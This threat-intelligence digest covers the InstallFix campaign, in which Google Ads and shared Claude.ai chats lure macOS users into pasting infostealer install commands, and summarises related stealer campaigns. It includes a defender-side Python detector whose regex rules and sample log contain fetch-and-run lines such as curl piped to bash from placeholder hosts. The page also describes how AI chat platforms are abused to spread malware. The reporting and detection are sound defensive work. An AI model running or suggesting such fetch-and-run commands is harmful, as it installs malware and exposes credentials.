InstallFix Campaign Expands to macOS via Google Ads and Abused Claude.ai Chats
Summary
Threat actors are expanding the InstallFix social engineering technique to abuse Google Ads and legitimate Claude.ai shared chats to distribute macOS malware. The attackers create weaponized installation guides embedded in publicly accessible Claude chats, tricking users into executing malicious commands that download and execute infostealers such as MacSync and in-memory loader scripts. The campaigns target macOS users searching for 'Claude mac download' via malvertising on Google Ads, using Anthropic's real claude.ai domain in sponsored search results. The malware variants harvest browser credentials, cookies, and macOS Keychain contents while evading detection through in-memory execution and selective victim profiling.
Timeline
- 06.03.2026 17:00 (2 articles): InstallFix Attacks Distribute Amatera Infostealer via Fake Claude Code Install Guides
  Threat actors expand the InstallFix campaign to macOS by abusing Google Ads and embedding malicious installation instructions in legitimate Claude.ai shared chats. The weaponized chats, masquerading as official guides (e.g., attributed to 'Apple Support'), instruct users to paste terminal commands that download and execute macOS malware variants. Two separate payloads are identified: one using the MacSync infostealer to harvest browser credentials, cookies, and macOS Keychain contents, and another using an in-memory loader script executed via osascript to evade detection. The malvertising campaign targets users searching for 'Claude mac download' and leverages Anthropic's real claude.ai domain in sponsored search results, making the attack more deceptive. The malware includes selective targeting checks to exclude victims based on Russian or CIS-region keyboard input sources.
  Sources:
  - Fake Claude Code install guides push infostealers in InstallFix attacks — www.bleepingcomputer.com — 06.03.2026 17:00
  - Hackers abuse Google ads, Claude.ai chats to push Mac malware — www.bleepingcomputer.com — 10.05.2026 20:52
Information Snippets
The source for every snippet is www.bleepingcomputer.com; the two articles are listed under Timeline.
- InstallFix exploits the 'curl-to-bash' practice by developers to execute scripts without inspection. (First reported 06.03.2026 17:00; 1 source, 2 articles)
- Attackers use cloned pages for popular CLI tools like Claude Code to serve malicious install commands. (First reported 06.03.2026 17:00; 1 source, 2 articles)
- The malicious commands download and execute the Amatera infostealer from an attacker-controlled endpoint. (First reported 06.03.2026 17:00; 1 source, 2 articles)
- Amatera is a new malware family based on ACR Stealer, sold as a subscription service (MaaS). (First reported 06.03.2026 17:00; 1 source, 1 article)
- The attacks are promoted through malvertising campaigns on Google Ads, appearing in search results for queries like 'Claude Code install'. (First reported 06.03.2026 17:00; 1 source, 2 articles)
- The malicious sites are hosted on legitimate platforms such as Cloudflare Pages, Squarespace, and Tencent EdgeOne. (First reported 06.03.2026 17:00; 1 source, 1 article)
- Attackers abuse Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign targeting macOS users searching for 'Claude mac download'. (First reported 10.05.2026 20:52; 1 source, 1 article)
- Malicious instructions are embedded in publicly accessible Claude.ai shared chats masquerading as official installation guides (e.g., attributed to 'Apple Support'). (First reported 10.05.2026 20:52; 1 source, 1 article)
- The macOS malware variant executes commands entirely in memory via osascript, avoiding disk traces, and harvests browser credentials, cookies, and macOS Keychain contents. (First reported 10.05.2026 20:52; 1 source, 1 article)
- The malware includes profiling checks to exclude victims based on Russian or CIS-region keyboard input sources, indicating selective targeting. (First reported 10.05.2026 20:52; 1 source, 1 article)
- Two separate infrastructure variants were identified: one using the MacSync infostealer and another using an in-memory loader script. (First reported 10.05.2026 20:52; 1 source, 1 article)
- The malvertising campaign uses legitimate claude.ai URLs in Google Ads, leveraging Anthropic's domain directly for malicious chat content. (First reported 10.05.2026 20:52; 1 source, 1 article)
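As an added defender-side example (not code from the page or from any of the cited reports), the following Python flags the InstallFix behaviours the snippets above describe when they appear in process-start logs: a remote fetch piped straight into an interpreter, osascript handed inline code, and a base64-decoded stage executed without touching disk. The log format ('timestamp user command-line'), the usernames and every URL are constructed placeholders.

```python
"""Flag InstallFix-style 'paste this into Terminal' chains in process logs.
Added example, not from the page or any vendor tool. The log format
('timestamp user command-line') and every URL below are constructed."""
import re
from typing import Dict, List

# Rule order is also report order; each is a behavioural indicator, not a signature.
RULES = [
    # Remote fetch piped straight into an interpreter ("curl-to-bash").
    ("fetch-pipe-exec", re.compile(
        r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh|python3?|osascript)\b")),
    # osascript handed inline code: the in-memory loader pattern.
    ("osascript-inline", re.compile(r"\bosascript\b[^|;&]*\s-e\s")),
    # AppleScript bridging back into a shell.
    ("osascript-shell", re.compile(r"do shell script", re.I)),
    # Encoded stage decoded and executed without touching disk.
    ("base64-decode-exec", re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b")),
]

def classify(cmdline: str) -> List[str]:
    """Return the names of every rule the command line trips, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(log: str) -> List[Dict[str, object]]:
    """Parse 'ts user cmdline' lines and keep only those with findings."""
    hits = []
    for line in log.strip().splitlines():
        ts, user, cmdline = line.split(" ", 2)
        tags = classify(cmdline)
        if tags:
            hits.append({"ts": ts, "user": user, "tags": tags, "cmdline": cmdline})
    return hits

# Constructed sample: two InstallFix-like commands, a wget variant, and two
# ordinary developer commands that must not be flagged ("aGVsbG8=" is just "hello").
SAMPLE_LOG = """
2026-05-10T20:52:01Z alice /bin/zsh -c "curl -fsSL https://install.example.invalid/setup.sh | bash"
2026-05-10T20:52:03Z alice /usr/bin/osascript -e "do shell script \\"echo aGVsbG8= | base64 -D | sh\\""
2026-05-10T20:53:10Z bob /usr/bin/curl -O https://downloads.example.invalid/tool.tar.gz
2026-05-10T20:54:00Z carol /bin/bash -c "brew install node"
2026-05-10T20:55:00Z dave /bin/sh -c "wget -qO- https://pkg.example.invalid/x.sh | sudo bash"
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ts"], h["user"], ",".join(h["tags"]), "::", h["cmdline"])
```

The rules are deliberately behavioural rather than tied to any domain or hash, so legitimate `curl | bash` installers will also surface; treat hits as triage candidates and correlate with the sponsored-search and shared-chat lures described above.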
Similar Happenings
341 Malicious ClawHub Skills Target OpenClaw Users with Atomic Stealer
A security audit by Koi Security identified 341 malicious skills on ClawHub, a marketplace for OpenClaw users, which distribute Atomic Stealer malware to steal sensitive data from macOS and Windows systems. The campaign, codenamed ClawHavoc, uses social engineering tactics to trick users into installing malicious prerequisites. The skills masquerade as legitimate tools, including cryptocurrency utilities, YouTube tools, and finance applications. OpenClaw has added a reporting feature and partnered with VirusTotal to scan skills uploaded to ClawHub, providing an additional layer of security for the OpenClaw community. The malware targets API keys, credentials, and other sensitive data, exploiting the open-source ecosystem's vulnerabilities. The campaign coincides with a report from OpenSourceMalware highlighting the same threat. The intersection of AI agent capabilities and persistent memory amplifies the risks, enabling stateful, delayed-execution attacks.
New findings reveal almost 400 fake crypto trading add-ons in the project behind the viral Moltbot/OpenClaw AI assistant tool that can lead users to install information-stealing malware. These add-ons, called skills, masquerade as cryptocurrency trading automation tools and target ByBit, Polymarket, Axiom, Reddit, and LinkedIn. The malicious skills share the same command-and-control (C2) infrastructure, 91.92.242.30, and use sophisticated social engineering to convince users to execute malicious commands that then steal crypto assets such as exchange API keys, wallet private keys, SSH credentials, and browser passwords.
Additionally, fake OpenClaw installers hosted on GitHub and promoted by Bing AI instructed users to run commands that deployed information stealers and proxy malware. Threat actors set up malicious GitHub repositories posing as OpenClaw installers, which Bing recommended in its AI-powered search results. The malicious repositories contained shell scripts paired with Mach-O executables identified as Atomic Stealer malware for macOS users. For Windows users, the threat actor delivered OpenClaw_x64.exe, which deployed multiple malicious executables, including Rust-based malware loaders and the Vidar stealer. Another Windows executable delivered was the GhostSocks backconnect proxy malware, designed to turn users' machines into proxy nodes.
GlassWorm malware targets OpenVSX, VS Code registries
GlassWorm has escalated into a multi-stage framework combining remote access trojans (RATs), data theft, and hardware wallet phishing, now leveraging Solana dead drops for C2, a novel browser extension for surveillance, and the Model Context Protocol (MCP) ecosystem. The campaign delivers a .NET binary targeting Ledger and Trezor devices by masquerading as configuration errors and prompting users to input recovery phrases, while a WebSocket-based JavaScript RAT exfiltrates browser data and deploys HVNC or SOCKS proxy modules. The malware uses a Google Chrome extension disguised as Google Docs Offline for session surveillance on cryptocurrency platforms like Bybit and harvests extensive browser data. Recent innovations include a Zig-compiled dropper embedded within an Open VSX extension named 'specstudio.code-wakatime-activity-tracker' masquerading as WakaTime, which installs platform-specific Node.js native addons compiled from Zig code to stealthily infect all IDEs on a developer's machine. This dropper downloads a malicious VS Code extension (.VSIX) named 'floktokbok.autoimport' from an attacker-controlled GitHub account, which impersonates a legitimate extension with over 5 million installs and installs silently across all detected IDEs, avoiding execution on Russian systems and communicating with the Solana blockchain for C2. A new large-scale social engineering campaign has emerged that distributes fake VS Code security alerts posted in GitHub Discussions; the posts are automated across thousands of repositories using low-activity accounts and trigger GitHub email notifications carrying fake vulnerability advisories with realistic CVE references. Links redirect victims through a cookie-driven chain to drnatashachinn[.]com, where a JavaScript reconnaissance payload profiles targets before delivering additional malicious payloads. This operation represents a coordinated, large-scale effort targeting developers.
GlassWorm remains a persistent supply chain threat impacting the npm, PyPI, GitHub, and Open VSX ecosystems. Since its emergence in October 2025, the campaign has evolved from invisible Unicode steganography in VS Code extensions to a sophisticated multi-vector operation spanning 151 compromised GitHub repositories and dozens of malicious npm packages. The threat actor, assessed to be Russian-speaking, continues to avoid infecting Russian-locale systems and leverages Solana blockchain transactions as dead drops for C2 resolution. Recent developments include the ForceMemo offshoot that force-pushes malicious code into Python repositories, the abuse of extensionPack and extensionDependencies for transitive malware delivery, and the introduction of Rust-based implants targeting developer toolchains. The Eclipse Foundation and Open VSX have implemented security measures such as token revocation and automated scanning, but the threat actors have repeatedly adapted by rotating infrastructure, obfuscating payloads, and expanding into new ecosystems like MCP servers. A new wave of the GlassWorm campaign targets the Open VSX ecosystem with 73 "sleeper" extensions that activate after updates, delivering malware to developers. Six extensions have already been activated, while the remainder remain dormant or suspicious. The campaign leverages thin loaders that fetch secondary VSIX packages or platform-specific modules at runtime, marking a shift in the group's tactics to evade detection by avoiding direct malware embedding in initial uploads. The extensions mimic legitimate listings using identical icons and near-identical names to deceive developers. Developers who installed these extensions are advised to rotate all secrets and perform a full system clean-up.
GPUGate Malware Campaign Targets IT Firms in Western Europe
The **GPUGate malware campaign** continues to evolve, now leveraging **Claude AI artifacts and Google Ads** to distribute **MacSync and AMOS infostealers** via **ClickFix attacks**. Over **15,600 users** have accessed malicious Claude-generated guides, which instruct victims to execute Terminal commands fetching malware payloads. This follows earlier waves abusing **ChatGPT/Grok chats, fake GitHub repositories, and malvertising** to deploy stealers targeting credentials, crypto wallets, and system data. The campaign, active since **April 2023**, has expanded from traditional phishing to **abusing AI ecosystems, supply-chain weaknesses, and trusted platforms** (e.g., Homebrew, LogMeIn, AI assistants). Russian-speaking actors operate **AMOS as a Malware-as-a-Service (MaaS)**, with stolen logs sold in underground markets to fuel fraud, ransomware, and account takeovers. The latest **Claude artifact abuse** underscores the shift toward **high-impact, scalable distribution channels**, exploiting weak platform vetting and user trust in AI-generated content. Organizations should monitor for **suspicious Terminal activity, C2 traffic to domains like `a2abotnet[.]com`, and unauthorized data egress** while educating users on **ClickFix-style lures** and unverified AI tool instructions.
Shamos Infostealer Targeting Mac Devices via ClickFix Attacks
Since June 2025, the COOKIE SPIDER group’s Shamos infostealer and Atomic macOS Stealer (AMOS) variants have targeted Mac devices via evolving ClickFix social engineering campaigns, stealing data and credentials from browsers, Keychain, Apple Notes, and cryptocurrency wallets. Early campaigns relied on malvertising, fake GitHub repositories, and signed Swift applications hosted on legitimate platforms like Cloudflare Pages and Squarespace. AMOS has been delivered through disk images, obfuscated shell scripts, and in-memory payloads, expanding from Terminal-based ClickFix tactics to abuse trusted macOS applications. In March 2026, Apple introduced a Terminal security feature in macOS Tahoe 26.4 that blocks pasted command execution and warns users of risks, disrupting ClickFix attack chains. A new campaign observed in April 2026 by Jamf researchers now abuses the built-in Script Editor application to bypass these protections. The campaign uses fake Apple-themed disk cleanup guides to trick users into launching Script Editor via the applescript:// URL scheme, executing an obfuscated payload in system memory that delivers Atomic Stealer. The new Script Editor-based ClickFix variation enables theft of Keychain data, browser autofill information, cryptocurrency wallet extensions, and system details without requiring Terminal interaction. AMOS continues to expand its capabilities, now including a backdoor component for persistent access to compromised systems.